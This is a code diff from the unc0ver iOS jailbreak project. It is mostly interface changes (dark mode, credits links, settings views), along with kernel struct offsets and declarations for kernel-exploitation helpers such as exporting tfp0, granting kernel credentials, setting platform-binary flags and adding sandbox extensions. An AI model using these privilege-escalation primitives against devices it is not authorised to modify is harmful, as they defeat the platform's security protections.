+    [self.miscMistyButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.benButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.samGButton setTitleColor:[UIColor blackColor] forState:normal];
+    [self.dennisButton setTitleColor:[UIColor blackColor] forState:normal];
+}
+
 + (NSURL *)getURLForUserName:(NSString *)userName {
     if ([[UIApplication sharedApplication] canOpenURL:[NSURL URLWithString:@"tweetbot://"]]) {
         return [NSURL URLWithString:[NSString stringWithFormat:@"tweetbot:///user_profile/%@", userName]];
@@ -110,30 +165,14 @@
     [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"Jakeashacks"] options:@{} completionHandler:nil];
 }
 
--(IBAction)tappedOnJonathanSeals:(id)sender{
-    [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"JonathanSeals"] options:@{} completionHandler:nil];
-}
-
 -(IBAction)tappedOnSaurik:(id)sender{
     [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"saurik"] options:@{} completionHandler:nil];
 }
 
--(IBAction)tappedOnUndecimusResources:(id)sender{
-    [[UIApplication sharedApplication] openURL:[NSURL URLWithString:@"https://github.com/pwn20wndstuff/Undecimus-Resources"] options:@{} completionHandler:nil];
-}
-
--(IBAction)tappedOnTihmstar:(id)sender{
-    [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"tihmstar"] options:@{} completionHandler:nil];
-}
-
 -(IBAction)tappedOnSiguza:(id)sender{
     [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"s1guza"] options:@{} completionHandler:nil];
 }
 
--(IBAction)tappedOnS0rryMyBad:(id)sender{
-    [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"S0rryMyBad"] options:@{} completionHandler:nil];
-}
-
 -(IBAction)tappedOnExternalist:(id)sender{
     [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"Externalist"] options:@{} completionHandler:nil];
 }
@@ -158,24 +197,20 @@
     [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"MiscMisty"] options:@{} completionHandler:nil];
 }
 
--(IBAction)tappedOnSemaphore:(id)sender{
-    [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"notcom"] options:@{} completionHandler:nil];
-}
-
--(IBAction)tappedOnPimskeks:(id)sender{
-    [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"pimskeks"] options:@{} completionHandler:nil];
-}
-
--(IBAction)tappedOnLibimobiledevice:(id)sender{
-    [[UIApplication sharedApplication] openURL:[NSURL URLWithString:@"https://github.com/libimobiledevice"] options:@{} completionHandler:nil];
-}
-
--(IBAction)tappedOnCoolStar:(id)sender{
-    [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"coolstarorg"] options:@{} completionHandler:nil];
-}
-
 -(IBAction)tappedOnBen:(id)sender{
     [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"benjweaverdev"] options:@{} completionHandler:nil];
 }
 
+- (IBAction)tappedOnSamG:(id)sender{
+    [[UIApplication sharedApplication] openURL:[NSURL URLWithString:@"https://reddit.com/u/Samg_is_a_Ninja"] options:@{} completionHandler:nil];
+}
+
+- (IBAction)tappedOnDennis:(id)sender{
+    [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"DennisBednarz"] options:@{} completionHandler:nil];
+}
+
+- (CGFloat)tableView:(UITableView *)tableView heightForRowAtIndexPath:(NSIndexPath *)indexPath {
+    return 44;
+}
+
 @end

Undecimus/source/FakeApt.h

@@ -14,7 +14,7 @@ NSDictionary *parseDependsOrProvides(NSString *string);
 BOOL compareDpkgVersion(NSString *version1, NSString *op, NSString *version2, BOOL *result);
 NSString *versionOfPkg(NSString *pkg);
 NSArray *resolveDepsForPkg(NSString * _Nonnull pkg, BOOL noPreDeps);
-BOOL extractDebsForPkg(NSString *pkg, NSMutableArray *installed, BOOL preDeps);
+BOOL extractDebsForPkg(NSString *pkg, NSMutableArray *installed, BOOL preDeps, bool doInject);
 NSDictionary *getPkgs(void);
 NSString *debForPkg(NSString *pkg);
 NSArray <NSString*> *debsForPkgs(NSArray <NSString*> *pkgs);

Undecimus/source/FakeApt.m

@@ -324,7 +324,7 @@ NSArray *resolveDepsForPkg(NSString *pkg, BOOL preDeps) {
     return resolveDepsForPkgWithQueue(pkg, nil, preDeps);
 }
 
-BOOL extractDebsForPkg(NSString *pkg, NSMutableArray *installed, BOOL preDeps) {
+BOOL extractDebsForPkg(NSString *pkg, NSMutableArray *installed, BOOL preDeps, bool doInject) {
     NSArray *pkgsForPkg = resolveDepsForPkg(pkg, preDeps);
     if (pkgsForPkg == nil || pkgsForPkg.count < 1) {
         LOG("Found no pkgs to install for \"%@\"", pkg);
@@ -342,7 +342,7 @@ BOOL extractDebsForPkg(NSString *pkg, NSMutableArray *installed, BOOL preDeps) {
         // Already installed all these
         return YES;
     }
-    if (!extractDebs(debsForPkg)) {
+    if (!extractDebs(debsForPkg, doInject)) {
         LOG("Failed to extract debs for \"%@\"", pkg);
         return NO;
     }

Undecimus/source/JailbreakViewController.h

@@ -10,12 +10,10 @@
 #import <UIProgressHUD.h>
 #import "common.h"
 
-#define __FILENAME__ (__builtin_strrchr(__FILE__, '/') ? __builtin_strrchr(__FILE__, '/') + 1 : __FILE__)
-
 #define _assert(test, message, fatal) do \
     if (!(test)) { \
         int saved_errno = errno; \
-        LOG("__assert(%d:%s)@%s:%u[%s]", saved_errno, #test, __FILENAME__, __LINE__, __FUNCTION__); \
+        LOG("_assert(%d:%s)@%s:%u[%s]", saved_errno, #test, __FILENAME__, __LINE__, __FUNCTION__); \
         if (message != nil) \
             showAlert(fatal ? @"Error (Fatal)" : @"Error (Nonfatal)", [NSString stringWithFormat:@"Errno: %d\nTest: %s\nFilename: %s\nLine: %d\nFunction: %s\nDescription: %@", saved_errno, #test, __FILENAME__, __LINE__, __FUNCTION__, message], true, false); \
         else \
@@ -33,23 +31,60 @@ while (false)
 
 #define notice(msg, wait, destructive) showAlert(@"Notice", msg, wait, destructive)
 
-#define status(msg, btnenbld, tbenbld) do { \
-    LOG("Status: %@", msg); \
+#define status(msg, btnenbld, nvbenbld) do { \
     dispatch_async(dispatch_get_main_queue(), ^{ \
+        if ([[[[[JailbreakViewController sharedController] goButton] titleLabel] text] isEqualToString:msg]) return; \
+        LOG("Status: %@", msg); \
         [UIView performWithoutAnimation:^{ \
             [[[JailbreakViewController sharedController] goButton] setEnabled:btnenbld]; \
-            [[[[JailbreakViewController sharedController] tabBarController] tabBar] setUserInteractionEnabled:tbenbld]; \
+            [[[JailbreakViewController sharedController] settingsButton] setUserInteractionEnabled:nvbenbld]; \
             [[[JailbreakViewController sharedController] goButton] setTitle:msg forState: btnenbld ? UIControlStateNormal : UIControlStateDisabled]; \
             [[[JailbreakViewController sharedController] goButton] layoutIfNeeded]; \
         }]; \
     }); \
 } while (false)
 
+#define progress(x) do { \
+    dispatch_async(dispatch_get_main_queue(), ^{ \
+        if ([[[[JailbreakViewController sharedController] exploitMessageLabel] text] isEqualToString:x]) return; \
+        LOG("Progress: %@", x); \
+        [[[JailbreakViewController sharedController] exploitMessageLabel] setText:x]; \
+    }); \
+} while (false)
+
 @interface JailbreakViewController : UIViewController
 @property (weak, nonatomic) IBOutlet UIButton *goButton;
 @property (weak, nonatomic) IBOutlet UITextView *outputView;
+@property (weak, nonatomic) IBOutlet UIButton *darkModeButton;
+@property (weak, nonatomic) IBOutlet UIButton *settingsButton;
+@property (weak, nonatomic) IBOutlet UIButton *mainDevsButton;
+
+@property (weak, nonatomic) IBOutlet UILabel *exploitProgressLabel;
+@property (weak, nonatomic) IBOutlet UILabel *exploitMessageLabel;
+@property (weak, nonatomic) IBOutlet UILabel *u0Label;
+@property (weak, nonatomic) IBOutlet UILabel *uOVersionLabel;
+
+@property (weak, nonatomic) IBOutlet UIProgressView *jailbreakProgressBar;
+
+@property (weak, nonatomic) IBOutlet UIView *mainView;
+@property (weak, nonatomic) IBOutlet UIView *creditsView;
+@property (weak, nonatomic) IBOutlet UIView *settingsView;
+@property (weak, nonatomic) IBOutlet UIView *mainDevView;
+@property (weak, nonatomic) IBOutlet UIView *backgroundView;
+
+@property (weak, nonatomic) IBOutlet UINavigationBar *settingsNavBar;
+@property (weak, nonatomic) IBOutlet UINavigationBar *creditsNavBar;
+
+@property (weak, nonatomic) IBOutlet UILabel *jailbreakLabel;
+@property (weak, nonatomic) IBOutlet UILabel *byLabel;
+@property (weak, nonatomic) IBOutlet UILabel *uncoverLabel;
+@property (weak, nonatomic) IBOutlet UILabel *supportedOSLabel;
+@property (weak, nonatomic) IBOutlet UILabel *UIByLabel;
+@property (weak, nonatomic) IBOutlet UILabel *firstAndLabel;
+@property (weak, nonatomic) IBOutlet UILabel *fourthAndLabel;
+
+
 @property (readonly) JailbreakViewController *sharedController;
-@property (weak, nonatomic) IBOutlet NSLayoutConstraint *goButtonSpacing;
 @property (assign) BOOL canExit;
 
 double uptime(void);
@@ -59,6 +94,7 @@ NSString *hexFromInt(NSInteger val);
 - (IBAction)tappedOnJailbreak:(id)sender;
 +(JailbreakViewController*)sharedController;
 - (void)appendTextToOutput:(NSString*)text;
+- (void)updateStatus;
 
 @end
 
@@ -77,6 +113,9 @@ static inline UIProgressHUD *addProgressHUD() {
 }
 
 static inline void removeProgressHUD(UIProgressHUD *hud) {
+    if (hud == nil) {
+        return;
+    }
     dispatch_semaphore_t semaphore = dispatch_semaphore_create(0);
     dispatch_async(dispatch_get_main_queue(), ^{
         [hud hide];
@@ -87,6 +126,9 @@ static inline void removeProgressHUD(UIProgressHUD *hud) {
 }
 
 static inline void updateProgressHUD(UIProgressHUD *hud, NSString *msg) {
+    if (hud == nil) {
+        return;
+    }
     dispatch_semaphore_t semaphore = dispatch_semaphore_create(0);
     dispatch_async(dispatch_get_main_queue(), ^{
         [hud setText:msg];

Undecimus/source/JailbreakViewController.m

@@ -23,11 +23,15 @@
 static JailbreakViewController *sharedController = nil;
 static NSMutableString *output = nil;
 static NSString *bundledResources = nil;
+extern int maxStage;
 
 - (IBAction)tappedOnJailbreak:(id)sender
 {
-    status(localize(@"Jailbreak"), false, false);
-    auto const block = ^(void) {
+    [self.exploitMessageLabel setAlpha:1];
+    [self.exploitProgressLabel setAlpha:1];
+    [self.jailbreakProgressBar setAlpha:1];
+    
+    void (^const block)(void) = ^(void) {
         _assert(bundledResources != nil, localize(@"Bundled Resources version missing."), true);
         if (!jailbreakSupported()) {
             status(localize(@"Unsupported"), false, true);
@@ -38,32 +42,67 @@ static NSString *bundledResources = nil;
     dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_HIGH, 0ul), block);
 }
 
-- (void)viewWillAppear:(BOOL)animated {
-    [super viewWillAppear:animated];
-    auto prefs = copy_prefs();
+- (void)updateStatus {
+    prefs_t *prefs = copy_prefs();
+    
     if (!jailbreakSupported()) {
         status(localize(@"Unsupported"), false, true);
+        progress(localize(@"Unsupported"));
     } else if (prefs->restore_rootfs) {
         status(localize(@"Restore RootFS"), true, true);
+        progress(localize(@"Ready to restore RootFS"));
     } else if (jailbreakEnabled()) {
         status(localize(@"Re-Jailbreak"), true, true);
+        progress(localize(@"Ready to re-jailbreak"));
     } else {
         status(localize(@"Jailbreak"), true, true);
+        progress(localize(@"Ready to jailbreak"));
     }
+    
     release_prefs(&prefs);
 }
 
+- (void)viewWillAppear:(BOOL)animated {
+    [super viewWillAppear:animated];
+    
+    [self.jailbreakProgressBar setProgress:0];
+    [self.jailbreakProgressBar setTransform:CGAffineTransformScale(CGAffineTransformIdentity, 1, 2)];
+    
+    [self.settingsView setTransform:CGAffineTransformScale(CGAffineTransformIdentity, 0.7, 0.7)];
+    [self.settingsView setAlpha:0];
+    [self.mainDevView setTransform:CGAffineTransformScale(CGAffineTransformIdentity, 0.7, 0.7)];
+    [self.mainDevView setAlpha:0];
+    [self.creditsView setTransform:CGAffineTransformScale(CGAffineTransformIdentity, 0.7, 0.7)];
+    [self.creditsView setAlpha:0];
+}
+
 - (void)viewDidLoad {
     [super viewDidLoad];
     _canExit = YES;
     // Do any additional setup after loading the view, typically from a nib.
-    auto prefs = copy_prefs();
+    prefs_t *prefs = copy_prefs();
+    
     if (prefs->hide_log_window) {
         _outputView.hidden = YES;
         _outputView = nil;
-        _goButtonSpacing.constant += 80;
     }
+    
+    if (prefs->dark_mode) {
+        [self darkMode];
+    } else {
+        [self lightMode];
+    }
+    
     release_prefs(&prefs);
+    
+    [self.settingsNavBar setBackgroundImage:[UIImage new] forBarMetrics:UIBarMetricsDefault];
+    [self.settingsNavBar setShadowImage:[UIImage new]];
+    [self.creditsNavBar setBackgroundImage:[UIImage new] forBarMetrics:UIBarMetricsDefault];
+    [self.creditsNavBar setShadowImage:[UIImage new]];
+    [[NSNotificationCenter defaultCenter] addObserver:self selector:@selector(showSpeicalThanks:) name:@"showSpecialThanks" object:nil];
+    [self.exploitProgressLabel setText:[NSString stringWithFormat:@"%d/%d", 0, maxStage]];
+    [self.uOVersionLabel setText:[NSString stringWithFormat:@"unc0ver Version: %@", appVersion()]];
+    
     sharedController = self;
     bundledResources = bundledResourcesVersion();
     LOG("unc0ver Version: %@", appVersion());
@@ -76,30 +115,145 @@ static NSString *bundledResources = nil;
     }
 }
 
+- (void)darkMode {
+    [[NSNotificationCenter defaultCenter] postNotificationName:@"darkModeSettings" object:self];
+    [[NSNotificationCenter defaultCenter] postNotificationName:@"darkModeCredits" object:self];
+    
+    [self.darkModeButton setImage:[UIImage imageNamed:@"DarkMode-Dark"] forState:UIControlStateNormal];
+    [self.settingsButton setImage:[UIImage imageNamed:@"Settings-Dark"] forState:UIControlStateNormal];
+    [self.exploitProgressLabel setTextColor:[UIColor whiteColor]];
+    [self.exploitMessageLabel setTextColor:[UIColor whiteColor]];
+    [self.u0Label setTextColor:[UIColor whiteColor]];
+    [self.uOVersionLabel setTextColor:[UIColor whiteColor]];
+    [self.jailbreakLabel setTextColor:[UIColor whiteColor]];
+    [self.byLabel setTextColor:[UIColor whiteColor]];
+    [self.UIByLabel setTextColor:[UIColor whiteColor]];
+    [self.firstAndLabel setTextColor:[UIColor whiteColor]];
+    [self.uncoverLabel setTextColor:[UIColor whiteColor]];
+    [self.supportedOSLabel setTextColor:[UIColor whiteColor]];
+    [self.fourthAndLabel setTextColor:[UIColor whiteColor]];
+    [self.outputView setTextColor:[UIColor whiteColor]];
+    [self.backgroundView setBackgroundColor:[UIColor colorWithRed:10.0f/255.0f green:13.0f/255.0f blue:17.0f/255.0f alpha:0.97f]];
+    [self.mainDevsButton setTitleColor:[UIColor whiteColor] forState:normal];
+    [self.settingsNavBar setTintColor:[UIColor whiteColor]];
+    [self.settingsNavBar setTitleTextAttributes:@{NSForegroundColorAttributeName:[UIColor whiteColor]}];
+    [self.settingsNavBar setLargeTitleTextAttributes:@{NSForegroundColorAttributeName:[UIColor whiteColor]}];
+    [self.creditsNavBar setTintColor:[UIColor whiteColor]];
+    [self.creditsNavBar setTitleTextAttributes:@{NSForegroundColorAttributeName:[UIColor whiteColor]}];
+    [self.creditsNavBar setLargeTitleTextAttributes:@{NSForegroundColorAttributeName:[UIColor whiteColor]}];
+    self.jailbreakProgressBar.trackTintColor = [UIColor blackColor];
+    [self setNeedsStatusBarAppearanceUpdate];
+}
+
+- (void)lightMode {
+    [[NSNotificationCenter defaultCenter] postNotificationName:@"lightModeSettings" object:self];
+    [[NSNotificationCenter defaultCenter] postNotificationName:@"lightModeCredits" object:self];
+    
+    [self.darkModeButton setImage:[UIImage imageNamed:@"DarkMode-Light"] forState:UIControlStateNormal];
+    [self.settingsButton setImage:[UIImage imageNamed:@"Settings-Light"] forState:UIControlStateNormal];
+    [self.exploitProgressLabel setTextColor:[UIColor blackColor]];
+    [self.exploitMessageLabel setTextColor:[UIColor blackColor]];
+    [self.u0Label setTextColor:[UIColor blackColor]];
+    [self.jailbreakLabel setTextColor:[UIColor blackColor]];
+    [self.byLabel setTextColor:[UIColor blackColor]];
+    [self.UIByLabel setTextColor:[UIColor blackColor]];
+    [self.firstAndLabel setTextColor:[UIColor blackColor]];
+    [self.fourthAndLabel setTextColor:[UIColor blackColor]];
+    [self.uncoverLabel setTextColor:[UIColor blackColor]];
+    [self.supportedOSLabel setTextColor:[UIColor blackColor]];
+    [self.uOVersionLabel setTextColor:[UIColor blackColor]];
+    [self.outputView setTextColor:[UIColor blackColor]];
+    [self.backgroundView setBackgroundColor:[UIColor.whiteColor colorWithAlphaComponent:0.84]];
+    [self.settingsNavBar setTintColor:[UIColor blackColor]];
+    [self.settingsNavBar setTitleTextAttributes:@{NSForegroundColorAttributeName:[UIColor blackColor]}];
+    [self.settingsNavBar setLargeTitleTextAttributes:@{NSForegroundColorAttributeName:[UIColor blackColor]}];
+    [self.creditsNavBar setTintColor:[UIColor blackColor]];
+    [self.creditsNavBar setTitleTextAttributes:@{NSForegroundColorAttributeName:[UIColor blackColor]}];
+    [self.creditsNavBar setLargeTitleTextAttributes:@{NSForegroundColorAttributeName:[UIColor blackColor]}];
+    self.jailbreakProgressBar.trackTintColor = [UIColor lightGrayColor]; 
+    [self setNeedsStatusBarAppearanceUpdate];
+}
+
+- (IBAction)enableDarkMode:(id)sender {
+    prefs_t *prefs = copy_prefs();
+    prefs->dark_mode = !prefs->dark_mode;
+    set_prefs(prefs);
+    [UIView animateWithDuration:0.5 delay:0 usingSpringWithDamping:1 initialSpringVelocity:1 options:UIViewAnimationOptionCurveEaseInOut animations:^{
+        if (prefs->dark_mode) {
+            [self darkMode];
+        } else {
+            [self lightMode];
+        }
+    } completion:nil];
+    release_prefs(&prefs);
+}
+
 - (void)didReceiveMemoryWarning {
     [super didReceiveMemoryWarning];
     // Dispose of any resources that can be recreated.
 }
 
 - (UIStatusBarStyle)preferredStatusBarStyle {
-    return UIStatusBarStyleDefault;
+    prefs_t *prefs = copy_prefs();
+    UIStatusBarStyle statusBarStyle = prefs->dark_mode ? UIStatusBarStyleLightContent : UIStatusBarStyleDefault;
+    release_prefs(&prefs);
+    return statusBarStyle;
+}
+
+- (IBAction)openSettings:(id)sender {
+    [UIView animateWithDuration:0.5 delay:0 usingSpringWithDamping:1 initialSpringVelocity:1 options:UIViewAnimationOptionCurveEaseInOut animations:^{
+        self.settingsView.transform = CGAffineTransformScale(CGAffineTransformIdentity, 1, 1);
+        self.settingsView.alpha = 1;
+        self.mainView.transform = CGAffineTransformScale(CGAffineTransformIdentity, 1.3, 1.3);
+        self.mainView.alpha = 0;
+    } completion:nil];
+}
+
+- (void) showSpeicalThanks:(NSNotification *) notification {
+    [UIView animateWithDuration:0.5 delay:0 usingSpringWithDamping:1 initialSpringVelocity:1 options:UIViewAnimationOptionCurveEaseInOut animations:^{
+        self.creditsView.transform = CGAffineTransformScale(CGAffineTransformIdentity, 1, 1);
+        self.creditsView.alpha = 1;
+        self.settingsView.transform = CGAffineTransformScale(CGAffineTransformIdentity, 1.3, 1.3);
+        self.settingsView.alpha = 0;
+    } completion:nil];
+}
+
+- (IBAction)dismissSpeicalThanks:(id)sender{
+    [UIView animateWithDuration:0.5 delay:0 usingSpringWithDamping:1 initialSpringVelocity:1 options:UIViewAnimationOptionCurveEaseInOut animations:^{
+        self.settingsView.transform = CGAffineTransformScale(CGAffineTransformIdentity, 1, 1);
+        self.settingsView.alpha = 1;
+        self.creditsView.transform = CGAffineTransformScale(CGAffineTransformIdentity, 0.7, 0.7);
+        self.creditsView.alpha = 0;
+    } completion:nil];
+}
+
+- (IBAction)closeSettings:(id)sender{
+    [UIView animateWithDuration:0.5 delay:0 usingSpringWithDamping:1 initialSpringVelocity:1 options:UIViewAnimationOptionCurveEaseInOut animations:^{
+        self.mainView.transform = CGAffineTransformScale(CGAffineTransformIdentity, 1, 1);
+        self.mainView.alpha = 1;
+        self.settingsView.transform = CGAffineTransformScale(CGAffineTransformIdentity, 0.7, 0.7);
+        self.settingsView.alpha = 0;
+    } completion:nil];
+    
+    [[NSNotificationCenter defaultCenter] postNotificationName:@"dismissKeyboard" object:self];
+
 }
 
 - (IBAction)tappedOnPwn:(id)sender{
     [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"Pwn20wnd"] options:@{} completionHandler:nil];
 }
 
-- (IBAction)tappedOnDennis:(id)sender{
-    [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"DennisBednarz"] options:@{} completionHandler:nil];
-}
-
 - (IBAction)tappedOnSamB:(id)sender{
     [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"sbingner"] options:@{} completionHandler:nil];
 }
 
-- (IBAction)tappedOnSamG:(id)sender{
-    [[UIApplication sharedApplication] openURL:[NSURL URLWithString:@"https://reddit.com/u/Samg_is_a_Ninja"] options:@{} completionHandler:nil];
+- (IBAction)tappendOnJoonwoo:(id)sender{
+    [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"iOS_App_Dev"] options:@{} completionHandler:nil];
 }
+- (IBAction)tappendOnUbik:(id)sender{
+    [[UIApplication sharedApplication] openURL:[CreditsTableViewController getURLForUserName:@"HiMyNameIsUbik"] options:@{} completionHandler:nil];
+}
+
 
 // This intentionally returns nil if called before it's been created by a proper init
 +(JailbreakViewController *)sharedController {

Undecimus/source/KernelExecution.m

@@ -58,7 +58,7 @@ bool init_kexec()
     if (!MACH_PORT_VALID(user_client)) return false;
 
     // From v0rtex - get the IOSurfaceRootUserClient port, and then the address of the actual client, and vtable
-    IOSurfaceRootUserClient_port = get_address_of_port(getpid(), user_client); // UserClients are just mach_ports, so we find its address
+    IOSurfaceRootUserClient_port = get_address_of_port(proc_struct_addr(), user_client); // UserClients are just mach_ports, so we find its address
     if (!KERN_POINTER_VALID(IOSurfaceRootUserClient_port)) return false;
 
     IOSurfaceRootUserClient_addr = ReadKernel64(IOSurfaceRootUserClient_port + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); // The UserClient itself (the C++ object) is at the kobject field

Undecimus/source/KernelOffsets.h

@@ -79,6 +79,7 @@ enum kernel_offset {
     KSTRUCT_OFFSET_HOST_SPECIAL,
     
     /* struct ucred */
+    KSTRUCT_OFFSET_UCRED_CR_REF,
     KSTRUCT_OFFSET_UCRED_CR_UID,
     KSTRUCT_OFFSET_UCRED_CR_RUID,
     KSTRUCT_OFFSET_UCRED_CR_SVUID,
@@ -98,6 +99,9 @@ enum kernel_offset {
     KSTRUCT_SIZE_IPC_ENTRY,
     KSTRUCT_OFFSET_IPC_ENTRY_IE_BITS,
     
+    /* struct vnode */
+    KSTRUCT_OFFSET_VNODE_V_FLAG,
+    
     /* vtable OSDictionary */
     KVTABLE_OFFSET_OSDICTIONARY_SETOBJECTWITHCHARP,
     KVTABLE_OFFSET_OSDICTIONARY_GETOBJECTWITHCHARP,

Undecimus/source/KernelOffsets.m

@@ -74,6 +74,7 @@ uint32_t kernel_offsets_11_0[] = {
 
     0x10, // KSTRUCT_OFFSET_HOST_SPECIAL
     
+    0x10, // KSTRUCT_OFFSET_UCRED_CR_REF
     0x18, // KSTRUCT_OFFSET_UCRED_CR_UID
     0x1c, // KSTRUCT_OFFSET_UCRED_CR_RUID
     0x20, // KSTRUCT_OFFSET_UCRED_CR_SVUID
@@ -91,6 +92,8 @@ uint32_t kernel_offsets_11_0[] = {
     0x18, // KSTRUCT_SIZE_IPC_ENTRY
     0x8, // KSTRUCT_OFFSET_IPC_ENTRY_IE_BITS
     
+    0x54, // KSTRUCT_OFFSET_VNODE_V_FLAG
+    
     0x1F, // KVTABLE_OFFSET_OSDICTIONARY_SETOBJECTWITHCHARP
     0x26, // KVTABLE_OFFSET_OSDICTIONARY_GETOBJECTWITHCHARP
     0x23, // KVTABLE_OFFSET_OSDICTIONARY_MERGE
@@ -170,6 +173,7 @@ uint32_t kernel_offsets_11_3[] = {
 
     0x10, // KSTRUCT_OFFSET_HOST_SPECIAL
 
+    0x10, // KSTRUCT_OFFSET_UCRED_CR_REF
     0x18, // KSTRUCT_OFFSET_UCRED_CR_UID
     0x1c, // KSTRUCT_OFFSET_UCRED_CR_RUID
     0x20, // KSTRUCT_OFFSET_UCRED_CR_SVUID
@@ -187,6 +191,8 @@ uint32_t kernel_offsets_11_3[] = {
     0x18, // KSTRUCT_SIZE_IPC_ENTRY
     0x8, // KSTRUCT_OFFSET_IPC_ENTRY_IE_BITS
     
+    0x54, // KSTRUCT_OFFSET_VNODE_V_FLAG
+    
     0x1F, // KVTABLE_OFFSET_OSDICTIONARY_SETOBJECTWITHCHARP
     0x26, // KVTABLE_OFFSET_OSDICTIONARY_GETOBJECTWITHCHARP
     0x23, // KVTABLE_OFFSET_OSDICTIONARY_MERGE
@@ -245,7 +251,7 @@ uint32_t kernel_offsets_12_0[] = {
     0xa0, // KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS
     
     0x60, // KSTRUCT_OFFSET_PROC_PID
-    0x108, // KSTRUCT_OFFSET_PROC_P_FD
+    0x100, // KSTRUCT_OFFSET_PROC_P_FD
     0x10, // KSTRUCT_OFFSET_PROC_TASK
     0xf8, // KSTRUCT_OFFSET_PROC_UCRED
     0x0, // KSTRUCT_OFFSET_PROC_P_LIST
@@ -282,6 +288,7 @@ uint32_t kernel_offsets_12_0[] = {
     
     0x10, // KSTRUCT_OFFSET_HOST_SPECIAL
     
+    0x10, // KSTRUCT_OFFSET_UCRED_CR_REF
     0x18, // KSTRUCT_OFFSET_UCRED_CR_UID
     0x1c, // KSTRUCT_OFFSET_UCRED_CR_RUID
     0x20, // KSTRUCT_OFFSET_UCRED_CR_SVUID
@@ -299,6 +306,8 @@ uint32_t kernel_offsets_12_0[] = {
     0x18, // KSTRUCT_SIZE_IPC_ENTRY
     0x8, // KSTRUCT_OFFSET_IPC_ENTRY_IE_BITS
     
+    0x54, // KSTRUCT_OFFSET_VNODE_V_FLAG
+    
     0x1F, // KVTABLE_OFFSET_OSDICTIONARY_SETOBJECTWITHCHARP
     0x26, // KVTABLE_OFFSET_OSDICTIONARY_GETOBJECTWITHCHARP
     0x23, // KVTABLE_OFFSET_OSDICTIONARY_MERGE

Undecimus/source/KernelUtilities.h

@@ -45,8 +45,9 @@ TODO:
 extern kptr_t kernel_base;
 extern uint64_t kernel_slide;
 
+extern kptr_t cached_proc_struct_addr;
 extern kptr_t cached_task_self_addr;
-extern BOOL found_offsets;
+extern bool found_offsets;
 
 kptr_t task_self_addr(void);
 kptr_t ipc_space_kernel(void);
@@ -59,45 +60,47 @@ mach_port_t fake_host_priv(void);
 int message_size_for_kalloc_size(int kalloc_size);
 
 kptr_t get_kernel_proc_struct_addr(void);
-BOOL iterate_proc_list(void (^handler)(kptr_t, pid_t, BOOL *));
+bool iterate_proc_list(void (^handler)(kptr_t, pid_t, bool *));
 kptr_t get_proc_struct_for_pid(pid_t pid);
-kptr_t get_address_of_port(pid_t pid, mach_port_t port);
+kptr_t proc_struct_addr(void);
+kptr_t get_address_of_port(kptr_t proc, mach_port_t port);
 kptr_t get_kernel_cred_addr(void);
 kptr_t give_creds_to_process_at_addr(kptr_t proc, kptr_t cred_addr);
-BOOL set_platform_binary(kptr_t proc, BOOL set);
+bool set_platform_binary(kptr_t proc, bool set);
 
 kptr_t zm_fix_addr(kptr_t addr);
 
-BOOL verify_tfp0(void);
+bool verify_tfp0(void);
 
 extern int (*pmap_load_trust_cache)(kptr_t kernel_trust, size_t length);
 int _pmap_load_trust_cache(kptr_t kernel_trust, size_t length);
 
-BOOL set_host_type(host_t host, uint32_t type);
-BOOL export_tfp0(host_t host);
-BOOL unexport_tfp0(host_t host);
+bool set_host_type(host_t host, uint32_t type);
+bool export_tfp0(host_t host);
+bool unexport_tfp0(host_t host);
 
-BOOL set_csflags(kptr_t proc, uint32_t flags, BOOL value);
-BOOL set_cs_platform_binary(kptr_t proc, BOOL value);
+bool set_csflags(kptr_t proc, uint32_t flags, bool value);
+bool set_cs_platform_binary(kptr_t proc, bool value);
 
-BOOL execute_with_credentials(kptr_t proc, kptr_t credentials, void (^function)(void));
+bool execute_with_credentials(kptr_t proc, kptr_t credentials, void (^function)(void));
 
 uint32_t get_proc_memstat_state(kptr_t proc);
-BOOL set_proc_memstat_state(kptr_t proc, uint32_t memstat_state);
-BOOL set_proc_memstat_internal(kptr_t proc, BOOL set);
-BOOL get_proc_memstat_internal(kptr_t proc);
+bool set_proc_memstat_state(kptr_t proc, uint32_t memstat_state);
+bool set_proc_memstat_internal(kptr_t proc, bool set);
+bool get_proc_memstat_internal(kptr_t proc);
 size_t kstrlen(kptr_t ptr);
-kptr_t kstralloc(const char *str);
-BOOL kstrfree(kptr_t ptr);
 kptr_t sstrdup(const char *str);
+kptr_t smalloc(size_t size);
 void sfree(kptr_t ptr);
+kptr_t IOMalloc(vm_size_t size);
+void IOFree(kptr_t address, vm_size_t size);
 int extension_create_file(kptr_t saveto, kptr_t sb, const char *path, size_t path_len, uint32_t subtype);
 int extension_create_mach(kptr_t saveto, kptr_t sb, const char *name, uint32_t subtype);
 int extension_add(kptr_t ext, kptr_t sb, const char *desc);
 void extension_release(kptr_t ext);
 void extension_destroy(kptr_t ext);
-BOOL set_file_extension(kptr_t sandbox, const char *exc_key, const char *path);
-BOOL set_mach_extension(kptr_t sandbox, const char *exc_key, const char *name);
+bool set_file_extension(kptr_t sandbox, const char *exc_key, const char *path);
+bool set_mach_extension(kptr_t sandbox, const char *exc_key, const char *name);
 kptr_t proc_find(pid_t pid);
 void proc_rele(kptr_t proc);
 void proc_lock(kptr_t proc);
@@ -114,16 +117,18 @@ void kauth_cred_unref(kptr_t cred);
